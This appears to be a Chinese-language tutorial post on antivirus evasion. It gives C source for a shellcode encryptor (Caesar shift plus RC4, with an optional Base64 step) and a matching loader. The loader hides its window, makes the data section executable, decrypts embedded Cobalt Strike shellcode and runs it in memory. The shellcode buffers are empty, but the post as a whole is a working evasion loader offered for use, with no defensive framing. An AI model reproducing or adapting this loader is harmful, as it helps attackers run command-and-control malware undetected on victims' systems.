免杀——凯撒+RC4+Base64分离免杀

Shellcode生成器：

buf是CS生成的Shellcode

#include "Caesar.h"
#include "Base64.h"
#include "RC4.h"

int main()
{
	unsigned char buf[] = ""
        
	unsigned char* buf1;

	int nLength = sizeof(buf) - 1;
	int nNewLength = 0;

	unsigned char key[] = "HelloWorld";

	//Base64
	//buf1 = Base64_Encode(buf, nLength, &nNewLength);

	//凯撒
	buf1 = buf;
	nNewLength = nLength;
	Caesar_Encryption(buf1, nNewLength, 7, 9);

	//RC4
	RC4_Crypt(buf1, nNewLength, key, sizeof(key) - 1);

	for (int i = 0; i < nNewLength; i++) {
		printf("\\x%02hx", buf1[i]);
	}

	//free(buf1);

	return 0;
}

 

加载器：

#include "Caesar.h"
#include "Base64.h"
#include "RC4.h"
#include <windows.h>

#include<Rpc.h>
#pragma comment(lib,"Rpcrt4.lib")


//data段可读写
#pragma comment(linker, "/section:.data,RWE") 

//不显示窗口
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) 
#pragma comment(linker, "/INCREMENTAL:NO") 

int main()
{
    unsigned char buf[] = "";
	
	int nLength = sizeof(buf) - 1;
	int nNewLength = 0;
	
	unsigned char key[] = "HelloWorld";
	
	RC4_Crypt(buf, nLength, key, sizeof(key) - 1);
	
	Caesar_Decryption(buf, nLength, 7, 9);
	
	((void(*)(void)) & buf)();

	MessageBox(NULL, L"", L"", NULL);
}